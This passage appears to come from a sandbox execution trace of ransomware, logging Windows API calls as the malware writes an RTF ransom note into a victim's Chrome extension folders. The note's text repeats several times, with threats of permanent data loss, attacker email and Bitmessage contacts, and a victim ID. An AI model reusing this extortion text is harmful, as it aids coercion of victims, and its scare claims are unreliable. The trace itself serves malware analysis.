irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0281.664] WriteFile (in: hFile=0x2c8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0281.665] CloseHandle (hObject=0x2c8) returned 1 [0281.665] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\#readme_eman#.rtf")) returned 0xffffffff [0281.665] GetLastError () returned 0x2 [0281.665] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\cs\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0281.666] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.666] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.666] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your 